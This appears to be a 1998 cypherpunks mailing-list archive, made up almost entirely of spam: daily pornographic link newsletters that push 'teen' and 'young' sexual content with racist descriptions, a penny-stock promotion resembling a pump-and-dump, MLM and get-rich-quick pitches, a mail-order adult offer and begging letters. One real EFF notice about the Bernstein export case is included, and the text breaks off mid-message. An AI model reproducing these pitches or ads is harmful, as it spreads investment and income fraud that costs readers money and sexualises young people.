This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
TAYLOR: Hugz & Hooters is  her  calling  card. Not only does
she have huge tits, but is one of the sweetest girls around.
Her site is chalk full  of pictures, including girl/girl and
three girl  lesbian  pictures.   She  also  posts  true life
erotic stories!
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
XXXStories.com: The largest free  erotic  story  site on the
net. Over 400 hot sex stories  on such topics as wife sluts,
virgins, group sex and more...... http://www.xxxstories.com/

DAILY CARTOON ........... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?160
Pic  2 ........................... http://137.39.63.229/?161
Pic  3 ........................... http://137.39.63.229/?162
Pic  4 ........................... http://137.39.63.229/?163
Pic  5 ........................... http://137.39.63.229/?164
Pic  6 ........................... http://137.39.63.229/?165
Pic  7 ........................... http://137.39.63.229/?166
Pic  8 ........................... http://137.39.63.229/?167
Pic  9 ........................... http://137.39.63.229/?168
Pic 10 ........................... http://137.39.63.229/?169

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iNqwx6tuC@vers1esv.com
Date: Fri, 16 Jan 1998 16:07:36 -0800 (PST)
To: dereg@electric33.com
Subject: Deregulation of US Electricity
Message-ID: <eGbRy27074Pi0>
MIME-Version: 1.0
Content-Type: text/plain


 DEREGULATION OF THE U.S ELECTRIC UTILITY
 INDUSTRY IS CREATING A $215 BILLION FINANCIAL
 OPPORTUNITY FOR YOU!

 Imagine Utility Savings of 20% - 40%!  now imagine 
 being a marketer of those savings and earning a recurring
 monthly  commission on the Utility usage of consumers
 throughout the country...

 <<<<< Call 1-800-358-2754  for 24 hr, 1 min message >>>>>

 __________________________________________________

 Effective Jan '98, Electric Utility Monopolies will be 
 dissolved on a State-by-State basis opening a $215
 "Billion Dollar" industry to free-market competition.

 We need independent "Electric Power Marketers" in 
 all 50 States especially California and the Northeast.
 Build a leveraged, recurring income in as little as
 10-15 hours/week.  full training and support; minimal
 start-up; lucrative.

 New Ground- Floor Opportunity with established 
 international networking giant.  Capitalize now on
 projected $10 Billion in annual revenue.

 People made millions with deregulation of the
 Telecommunications Industry.  The Electric Utility
 Industry will be three times the opportunity.

 <<< Call 1-800-358-2754  for 24 hr, 1 min message >>>

 (Please do not reply via e-mail.  Call our Voicemail and
 leave your name, telephone number and the best time 
 to call and we will contact you as soon as possible)

 To be removed, call the above number and SPELL your
 email address stating you would like to be removed from
 future mailings.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gDNW90rE6@m1Im.net
Date: Fri, 16 Jan 1998 17:09:27 -0800 (PST)
To: dereg@electric33.com
Subject: Deregulation of US Electricity
Message-ID: <1M17JFVNVdpMx5>
MIME-Version: 1.0
Content-Type: text/plain


 DEREGULATION OF THE U.S ELECTRIC UTILITY
 INDUSTRY IS CREATING A $215 BILLION FINANCIAL
 OPPORTUNITY FOR YOU!

 Imagine Utility Savings of 20% - 40%!  now imagine 
 being a marketer of those savings and earning a recurring
 monthly  commission on the Utility usage of consumers
 throughout the country...

 <<<<< Call 1-800-358-2754  for 24 hr, 1 min message >>>>>

 __________________________________________________

 Effective Jan '98, Electric Utility Monopolies will be 
 dissolved on a State-by-State basis opening a $215
 "Billion Dollar" industry to free-market competition.

 We need independent "Electric Power Marketers" in 
 all 50 States especially California and the Northeast.
 Build a leveraged, recurring income in as little as
 10-15 hours/week.  full training and support; minimal
 start-up; lucrative.

 New Ground- Floor Opportunity with established 
 international networking giant.  Capitalize now on
 projected $10 Billion in annual revenue.

 People made millions with deregulation of the
 Telecommunications Industry.  The Electric Utility
 Industry will be three times the opportunity.

 <<< Call 1-800-358-2754  for 24 hr, 1 min message >>>

 (Please do not reply via e-mail.  Call our Voicemail and
 leave your name, telephone number and the best time 
 to call and we will contact you as soon as possible)

 To be removed, call the above number and SPELL your
 email address stating you would like to be removed from
 future mailings.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: softdeals@hotmail.com
Date: Fri, 16 Jan 1998 18:40:47 -0800 (PST)
To: Offers@internet.net
Subject: Resolve to get Organized for 1998...Free Software!
Message-ID: <8354786523748>
MIME-Version: 1.0
Content-Type: text/plain


No more excuses...with Contact-Pro for Windows organizing your business, club or church contacts is quick, easy and effective...and, for a limited time only, it's FREE!

If you're at all like me, you've made the same resolution year after year:  This year I am going to organize my contact information so that I can...serve my clients better...save an enormous amount of time...make more money faster...etc.

But, like me (until I found Contact-Pro), year after year resolve failed in the face of complex, expensive, ineffective, time-
wasting software that either didn't do the job, was too costly to be realistic or was powerful but impossible to learn to use.

But, then, a friend introduced me to Contact-Pro and I finally got my business contacts organized quickly and almost instantaneously.  Now I keep track of all my addresses, phone numbers, relationship histories, and all my communications in one integrated, easy-to-use application.  I even use the merge mail and merge fax capability to send customized messages to prospects and customers. My business has never been better. Now, I'd like you to try Contact-Pro for your contact management needs.

It's probably the best contact manager money can buy. PC Magazine said it's "... so powerful it could run your business..." but they also said that "... its greatest strength is the ease with which you can manipulate data."

Contact-Pro is software for everyone from the home user to business networks.  Use it to organize your business, club, church or organizational contacts or members at any level to save time, enhance your client/customer satisfaction levels and increase profits, contributions, etc.

If it's so good, why is it free?

Because the developer needs users to try the product and spread the word to others who might be interested. No tricks, just really great software and a great deal!

You get the single-user Contact-Pro license absolutely free -- not a cut-down or restricted copy -- the full product! You pay only $14.95 to cover disks or CD, printed User Guide, shipping/handling and 30 days technical support via e-mail.

Simply go to our web site

http://www.contact-pro.com

for further information or to order your copy.

***********************************************************************
If you prefer not to receive special e-mail offers, simply click on the following link to get your e-mail address permanently removed from our list:

relatedmi@prodigy.net

***********************************************************************

Contact-Pro is the solution for you regardless of your company,club or personal requirements and this special offer makes it a must for churches and non-profit organizations anxious to keep costs under control.

Contact-Pro can read data directly from other database products like ACT!, Goldmine, TeleMagic and virtually all PIMs and personal organizers so you will never have to re-enter data. And, for a limited time only, it's FREE!...for more information or to order, go to the web site:

http://www.contact-pro.com

Relate Technologies, Inc. (a Delaware corporation, company profile is on the web site) is giving this exceptional product away as a means to build its user base and generate interest in multi-user, network versions of Contact-Pro. You will receive an unrestricted, fully registered, single-user version of Contact-Pro (Windows 3.1, 95 or NT). You will pay only $14.95 to cover the costs of diskettes or CD-ROM, printed User Guide and 30 day technical support via e-
mail. 

Our order system is a secure electronic transaction environment for your protection. Should you, despite the secure environment, prefer to order directly or use a check, you will find the necessary information to phone, fax or mail your order to Relate Technologies, Inc. on the web site.

Contact-Pro is available for single-users, networked groups and remote users. Order now and join thousands of current users who have "resolved to do it better" with their FREE copy of Contact-Pro.
Click here to go to http://www.contact-pro.com for information or to order your copy.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GoToWebPage@GoodNews-1998.net
Date: Sat, 17 Jan 1998 00:56:27 -0800 (PST)
To: SmartFolk@UwiseFolk.com
Subject: Confessions
Message-ID: <53358097_35361056>
MIME-Version: 1.0
Content-Type: text/plain



*********************************************************************
  - Remove from list information is after this important message -
*********************************************************************
                              *******

One person's journey from insurance adjuster, to crusader for 
equity of access:

http://Ppage.net?Tony.B

******************************************************************
******************************************************************
TO BE REMOVED FROM OUR MAILING LIST, TYPE: Legooo@ix.netcom.com
in the (TO:) area and (REMOVE) in the subject area of a new E-mail 
and send.
******************************************************************
******************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: failaqa35@psi.ch
Date: Fri, 16 Jan 1998 14:13:18 -0800 (PST)
To: failaqa35@psi.ch
Subject: StockAlert News: UNFC expects increase of $50M in assets
Message-ID: <199801162788FAA38691@post.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE></P><P ALIGN=CENTER> <FONT  COLOR="#000000" SIZE=3><B>REMINGTON-HALL CAPITALIZES ON RESURGENT REAL ESTATE MARKET 
Company expects to acquire $50 million in assets by mid-1998</B>
</P><P ALIGN=LEFT>  
DALLAS --<FONT  COLOR="#0080ff" SIZE=3><B> </B>UNFC<B> </B>), a diversified real estate investment firm formerly known as Universal Fuels Company, is quietly acquiring over $50 million in previously undervalued, undercapitalized or mismanaged commercial properties and making this new major player<FONT  COLOR="#0080ff" SIZE=3><B> </FONT><FONT  COLOR="#000000" SIZE=3></B>one of the best moderate-risk real estate investments in 1998.  
 
Founded in 1975 as Universal Fuels, the company provided uranium to the world as an alternative fuel, but as uranium became less used as a nuclear fuel source than other more economical and useful materials, Universal Fuels' stock declined almost to extinction over several years.  The stock price was less than 1 last year.
 
Four months ago officials from Camden-Townwest, a privately held real estate investment firm, approached Universal Fuels former management about converting Universal Fuels into a publicly traded real estate conglomerate.  Camden-Townwest, founded in 1994, grew from $19,000 in cash to $3 million in assets in three years without seeking any outside capital.  Since the change in management and corporate mission last October, <FONT  COLOR="#0080ff" SIZE=3><B> </B>UNFC<B> <FONT  COLOR="#0080ff" SIZE=3></B> </FONT><FONT  COLOR="#000000" SIZE=3>has seen its stock value increase by over 800%.   
 
Remington-Hall  is now making its move to increase assets at a tremendous rate.  By mid-year management expects to acquire in excess of $50 Million in office buildings and multi-family properties at a significant discount to their market value. "We have been referred to as 'Cat Burglars of Real Estate'," said Douglas Fonteno, president & chief executive officer, "and that's a title we plan to keep."
 
<U><B>Douglas T Fonteno</U> </B>previously Chairman of Camden-Townwest and formerly with Merrill Lynch, is Remington-Hall's new President & Chief Executive Officer.  <U><B>Larry Hood</U></B>,  <B> </B>formerly Chief Operating Officer of Pizza Inn and Chief Financial Officer of Reliance Mortgage Company, is Remington-Hall's Chief Financial Officer, giving the new company immediate and substantial financial integrity.  <U><B>Wade Hyde</U></B>, previously public relations and investor relations executive for Blockbuster Video and FoxMeyer Corporation, is Vice President of Marketing & Public Relations. 
 
Currently Remington-Hall<FONT  COLOR="#0080ff" SIZE=3> </FONT><FONT  COLOR="#000000" SIZE=3>is seeking to be listed on the Pacific Stock Exchange and the Nasdaq National Market.  The company anticipates announcing over $10 million in newly acquired assets by the end of January.
 
<B>Name:</B>		    Remington-Hall Capital Corporation  ( formerly Universal Fuels)
<B>Symbol:</B>	     Nasdaq:<FONT  COLOR="#0080ff" SIZE=3><B> </B>UNFC<B> </B>
<B>Mission:</B>	     To aggressively acquire steeply undervalued real estate properties
                       due to previous mismanagement or undercapitalization.   
<B>Management: </B>Senior executives with diverse experiences, including: 
                       Fortune 500 corporations, leading stock brokerage firms, 
                       real estate companies and national marketing.  
<B>Goals:</B>	           To increase assets to $10M by January 98 and $50M by mid-year  
<B>Address:</B>	     1401 Elm St., Ste. 1818, Dallas, TX  75202-2925
<B>Internet:</B>	     www.remington-hall.com <FONT  COLOR="#0080ff" SIZE=3><B>
</FONT><FONT  COLOR="#000000" SIZE=3>E-Mail:</B>	         <FONT  COLOR="#0080c0" SIZE=3><B>  </B>InvestorRelations@remington-hall.com<FONT  COLOR="#0000ff" SIZE=3>
</FONT><FONT  COLOR="#000000" SIZE=3><B>Quote:            </B>Yahoo! Remington-Hall<B> </B>

              Except for the historical information contained on the website,
              the matters set forth inthese documents are forward-looking
              statements within the meaning of the "safe harbour" provisions
              of the Private Securities Litigation Reform Act of 1995. These
              forward-looking statements are subject to risk and uncertainties
              that may cause actual results to differ materially. These forward-looking
              statements speak only as of the date hereof and the Company disclaims
              any intent or obligation to update these forward-looking statements.  
<FONT  COLOR="#000000" SIZE=3>
</PRE><




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sat, 17 Jan 1998 01:48:04 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Sat Jan 17 '98
Message-ID: <19980117082803.3088.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Saturday's issue of Eureka!

ULTIMATE HARDCORE
If you're  looking for  over 200  live  strip  shows and sex
crazed  video feeds  - 24 hours  a day!  -  thousands of XXX
photos - hundreds of Videos (Avis, Movs and Mpegs) - and all
totally free for a trial period,  then look no further.  The
only place you need to visit is Ultimate Hardcore. TRY FREE!
.. http://www.mr-cash.com/cgi-bin/ult-program.cgi/raw_3171/A

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
PAMELA ANDERSON SLURPS TOMMY LEE'S CUM!
http://porndirectory.com
And much more including Group Sex, Cumshots, Celebrities,
Oral, Anal, Fetish, Amateur, Anime, Asian, Black, Tits,
Butts, Pussies, Blondes, Brunettes, Redheads, Gay, and
Lesbian! VISIT NOW FREE!

ALREADY FAMOUS
OK, so you have seen them on  TV or in a magazine. Well here
they are in the buff.  A  totally free website featuring pix 
of different celebrities. Quick loading and a decent layout.
Already Famous ............ http://www.enjoythis.com/famous/

KAREN'S ANAL ADVENTURES
There is a whole lot of  dick  up the booty here! Pumpin and
grinding, two cocks one hole  and fisting. Ass fucked images
abound! Fast loading, high quality jpeg images.  Surf on by.
Karen's ........ http://shell8.ba.best.com/~widow2/anal.html

AMATEUR STRIPTEASE
They are selling videos, but they  include a lot of free pix
from the videos of all sorts  of amateurs. Lots of panty and
bra pictures. Good looking girl  next  door types. You might
not hang out there  all  day  but  these  images are worth a
visit. ..... http://w3.dreameagle.com/DreamEagle/gallery.htm

WET BRIANNA
This is one hot little tramp.  She  is  a sexy vixen sort of 
girl. There are some great  free  pix  of her sucking on her 
own tit and a lot of spread eagle shots of different colored
panties. This brunette is a  tight  number  and has the pink 
to show it. She even has  a  free  avi movie! This is a must
see! ............................ http://www.wetbrianna.com/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Bizarre ....................... http://204.244.215.7/teens2/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
MISS LAURIE: A 19  yr  old  Chinese  babe  who loves to show
people her chop suey.  She  loved  surfing  the  net for XXX
pictures, so she decided to start here own website featuring
herself. If you could get  this  hot Chinese dish delivered,
life  would  be  complete!  Visit  her  today  and  see  for
yourself.
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Erotic  Sex  Stories:  Free  sex   stories  in  5  different
subjects, and the stories are  illustrated with hardcore XXX
pics! You'll love it! ..... http://www.eroticsexstories.com/

DAILY CARTOON ........... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?170
Pic  2 ........................... http://137.39.63.229/?171
Pic  3 ........................... http://137.39.63.229/?172
Pic  4 ........................... http://137.39.63.229/?173
Pic  5 ........................... http://137.39.63.229/?174
Pic  6 ........................... http://137.39.63.229/?175
Pic  7 ........................... http://137.39.63.229/?176
Pic  8 ........................... http://137.39.63.229/?177
Pic  9 ........................... http://137.39.63.229/?178
Pic 10 ........................... http://137.39.63.229/?179

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <esoftware57@hotmail.com>
Date: Sat, 17 Jan 1998 14:03:47 -0800 (PST)
Subject: HOW WILL YOU SURVIVE WHEN YOU LOSE YOUR JOB?
Message-ID: <199801172203.OAA28689@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



HOW WILL YOU SURVIVE WHEN YOU LOSE YOUR JOB?

	*LEARN TO MAKE $1200 WEEKLY!!!

Thousands of harworking people, just like you and me, are 
getting laid off each and every day.  Working for someone 
else has NO JOB SECURITY!!  Most of us are living from 
paycheck to paycheck.  How long could you "stay afloat" if 
you lost your job?

Well, just give me 5 minutes of your time, and I will show you 
how you can take control of your financial future and have 
the SECURITY and WEALTH that YOU deserve!

You hold in your hands the most POWERFUL and 
REVEALING money making opportunity of the Millenium age.  
The 90's are gone. The year 2000 A.D. is less than 2 years 
away.  The "SECRETS" of riding the wave of the future can 
be yours.  The timing is right for you to break out of the ball 
and chain, 9 to 5 existence.

                 YOU CAN HAVE IT ALL!!!!!

    *that new car, your dream home, a special vacation!!

        These are $ money $ in the bank secrets.

      THE INTERNET POPULATION EXPLOSION IS
                                     UNDER  WAY!

More than 50 million people are currently on the Internet with 
an estimated 1 million more joining every month.  There will be 
at least 100 million on-line users by the year 2000, according 
to experts.  And all of these people will be looking for 
legitimate business opportunities on the Net. "HOW CAN I 
MAKE MONEY ON THE INTERNET?" is the most often 
asked question of ALL internet members.

THE DEMAND FOR INFORMATION IS ASTOUNDING!

FORTUNES are being made on the Internet RIGHT NOW 
and this is definitely the money making opportunity of a 
lifetime.  Where else can you reach 50 million potential 
customers a day from the peace and comfort of your own 
home?  Huge dollars are being made on the Internet RIGHT 
NOW by people just like you and me and your timing could 
not be better!

		YOU MUST ACT NOW!!!!

It's fun, it's easy, it's very simple and VERY REWARDING!

		GET IN NOW - WHILE YOU CAN!!!!!

This COMPLETE INTERNET BUSINESS KIT is the 
HOTTEST, MOST AMAZING and MOST PROFITABLE 
business available on the Internet today!

Included are:

	1. NET PROFITS - a 32 page manual specifically 
designed for people starting their own business on-line.  
Marketing startegies are presented for you to reach 
MILLIONS with YOUR information or products.

	2. FIVE NEW REPORTS - written in 1997 that 
present tax strategies for home-based businesses, show you 
how to get 300 new prospects weekly, give tips on 
advertising through major on-line services and more.

	3. CREDIT CARD PAYMENTS ON-LINE - how to 
accept these no matter where in the world you live!! This is 
VERY powerful information.

	4. And get a load of this!  Your COMPLETE 
INTERNET BUSINESS KIT comes with a customized sales 
letter that has been proven effective.  This letter has 
generated MANY, MANY orders and will do the same for you.

	5. Everything in this kit comes with UNlimited and 
UNrestricted reproduction rights.  You can not only sell the kit 
as your own, but you can sell ALL THE RIGHTS along with it!  
Check around!  You won't find any other company that lets 
you do this!

THERE'S SO MUCH MORE.....BUT, now what you're 
thinking is "What's this amazing, complete system going to 
cost me?"  $200.....$150........$100......

		BE PREPARED TO BE SHOCKED!!!!

This COMPLETE INTERNET BUSINESS KIT is only 
$24.95!!!!!!

	  **Everything you need to SUCCEED is included!

This program is normally $49.95 and is in HOT DEMAND 
even at this price.  But I'm SLASHING the price so 
hardworking people, just like YOU, can take advantage of 
this goldmine opportunity.

			ACT NOW!!!!!!!!

IT WON'T GET ANY EASIER THAN THIS!   BUT 
WAIT.......when you order within the next 7 days, I'll give you 
FREE:

Over 250 AMAZING REPORTS with ALL reprint and resale 
rights!! These alone could make you THOUSANDS OF 
DOLLARS!

And now you know what you stand to gain.  Let's consider 
the risk.  Just$24.95 and I'll tell you what.  I'll even take the 
risk out of the equation!  Try the kit for 30 days and if you 
don't think this opportunity  is for you, just send the kit back 
for a 100%, immediate refund.

		    "This is HOT! HOT! HOT!"

		ACT NOW!  DON'T WAIT!  "LIVE YOUR 
DREAMS".

			OR WORSE...

**don't get caught sitting at home *AFTER you lost your job, 
wondering what
you're going to do.

		    	ORDER NOW!!
		===========================

<Order (fastest) for $24.95 to:>
WorldNet-Distributors
909 Eagles Landing Pkwy.
Suite 140 P.O. BOX 203
Stockbridge, Ga.  30281   USA

Name___________________________________________
_______
Address__________________________________________
_____
City___________________ State_________  
Zip___________
E-mail 
address________________________________________

We can ship via:

 A. Postal Service (snail mail) 3 1/2" floppy disk. or manual.

 B. E-mail (Your order will be dispatched within 24 hours of
     receipt of funds - money order fastest)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wombat@aol.com
Date: Sat, 17 Jan 1998 10:49:39 -0800 (PST)
Subject: Adult Mail................Are you man enough?
Message-ID: <eaep.3.0.reg.BruBWG.35812.5746483796@smtp.wolfnet.com>
MIME-Version: 1.0
Content-Type: text/plain



*****************************You Must 18*********************************

Hi....Tired of all the B******T!

I am a Hot.............Horney.........New Jersey Co-Ed!

	I will sell you my Sweet Panties, 
		
	 	Hot Photo, 

			Hot, Horney Letter. 

You won't be dissapointed. 

$ 20.00, Cash, Check or Money Order, Large S.A.S.E., and 

A note stating you are 18 or older.

Send to:
		Vi  Grant
		Box 2002, Suite 2B,
	      Cherry Hill, NJ 08034

Please hurry, 

I have to get cash up for the Spring Semester, and I am sooo Horney!!

Thanx.......Vi

( My girlfriend and I snuck in to use the campus computer!)


****************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sun, 18 Jan 1998 03:22:20 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Sun Jan 18 '98
Message-ID: <19980118083145.2394.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Sunday's issue of Eureka!

INTERTAIN ONLINE
One of the longest-established adult sites on the web,  Int-
ertain Online  has grown and grown to feature more smut than
you could  probably view in a lifetime.  It is simply packed
with 10s of thousands of  photographs,  AVI and  MOV movies,
loads of  live video feeds,  stories and so much more.  Plus
you get to try it totally FREE for a whole week. Go and see!
IOL ...... http://www.intertain-inc.com/?banner_id=BID037000

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
A Planet Erotic - Hardcore XXX Entertainment 
http://www.planeterotic.com
Over 800 FREE Channels Of Live Sex Shows, Live Teen Strip
Shows And Video Porno Feeds. 60,000+ Hard & Softcore Pics
(10,000 NEW Pics a WEEK!). 100's of Erotic Stories, SeXXX
Chat, Casino, and much more!

FREE TEEN SEX
Quick and dirty, just the way you like it. They only have 11
free pictures but these are  some good looking young ladies!
Pussy spread  brunettes,  shaved  pussy  blondes.  Click the
link. ........... http://209.136.127.65/freepics/teensex.htm 

ADOL-ES-SCENTS
Score! Talk about some young  pussy! This website is loaded.
There are blondes, brunettes and  redheads.  In all sorts of
poses including bent over,  spread  eagle and flashing their
tits.  this images are  not huge but  they load pretty fast.
Adoles ........ http://www.jimsplace.com/jat/teen2/index.htm

TEENPARTY
I guess it's a party, with  36 lovely young ladies baring it
all for you to see.  Tight  and  trim  women showing it all.
There are shower  scenes  and  pictures  from  out in public
places and some great bedroom scenes.  Dig the pic28, in the
mirror! ............ http://www.teenparty.inter.net/main.htm

EASYTEENS
This is a well built website. The images are easy to get at.
Text links list blow  jobs,  group  sex, young teens, asian,
teens, hardcore sex,  nice  breasts,  lesbians, shaved pussy
and more! From those choices  you  go to thumbnailed images.
Pretty cool! ..................... http://www.easyteens.com/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Anal ........................... http://204.244.215.7/anal2/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
ELLEN: With over 40  FREE  pictures,  this  young lady is on
course to become a huge  Internet  hit! Her biography states
that her passion is giving  blow  jobs.  Which leaves us one
question. Where do we sign up?   Visit this chic and see how
crazy she is first hand.
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
T-Bone's Sex Club:  T-Bone  gives  you  a  new  selection of
erotic stories illustrated  with  nasty  hardcore pics! Last
week was Slut Wife week... what  will it be this week? Visit
T-Bone and find out! ............... http://www.rawsexx.com/

DAILY CARTOON ........... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?180
Pic  2 ........................... http://137.39.63.229/?181
Pic  3 ........................... http://137.39.63.229/?182
Pic  4 ........................... http://137.39.63.229/?183
Pic  5 ........................... http://137.39.63.229/?184
Pic  6 ........................... http://137.39.63.229/?185
Pic  7 ........................... http://137.39.63.229/?186
Pic  8 ........................... http://137.39.63.229/?187
Pic  9 ........................... http://137.39.63.229/?188
Pic 10 ........................... http://137.39.63.229/?189

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TKettle@juno.com
Date: Sun, 18 Jan 1998 17:03:02 -0800 (PST)
To: Friend@public.com
Subject: College Financing
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain



To whomever it may concern:

I am trying desperately to raise money for college. I have applied for numerous grants and
loans to no avail. This is my last chance. I will not burden you with the entire explanation
of my shortcomings. A friend of mine bought this e-mailer for me in the hopes that it works.
His plan is this: If I send a request for one dollar to millions of people, knowing that only
about 10% of you will actually read it and maybe 1/10th of those who read it will send me a
dollar, I might get enough to sustain my studies for a few years. It does not make me happy to
request alms, but I truly see no other alternatives.

     Those of you who wish to send me a single dollar may send it to the address listed below.
Nothing else will be sent by me to your account. This is not a mailing list. Those with
questions may reach me at Tkettle@Juno.com. Thank you for your time and patience.

Sincerely,

Thomas Kenneth Wootten
24 Victoria Drive
South Burlington, VT
05403






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 18 Jan 1998 21:11:48 -0800 (PST)
To: bernstein-announce
Subject: Unofficial transcript of Bernstein hearing published
Message-ID: <199801190451.UAA07568@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


EFF has published an unofficial transcript of the hearing in front of
three judges at the Ninth Circuit Court of Appeals in San Francisco on
December 8.  The hearing discussed whether the export controls on
cryptography are an unconstitutional prior restraint on publication.
See

    http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/Legal/

There is no news on the judges' decision from that hearing.

	John Gilmore
	Electronic Frontier Foundation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TKettle@juno.com
Date: Sun, 18 Jan 1998 20:51:04 -0800 (PST)
To: Friend@public.com
Subject: College Financing
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain



To whomever it may concern:

I am trying desperately to raise money for college. I have applied for numerous grants and
loans to no avail. This is my last chance. I will not burden you with the entire explanation
of my shortcomings. A friend of mine bought this e-mailer for me in the hopes that it works.
His plan is this: If I send a request for one dollar to millions of people, knowing that only
about 10% of you will actually read it and maybe 1/10th of those who read it will send me a
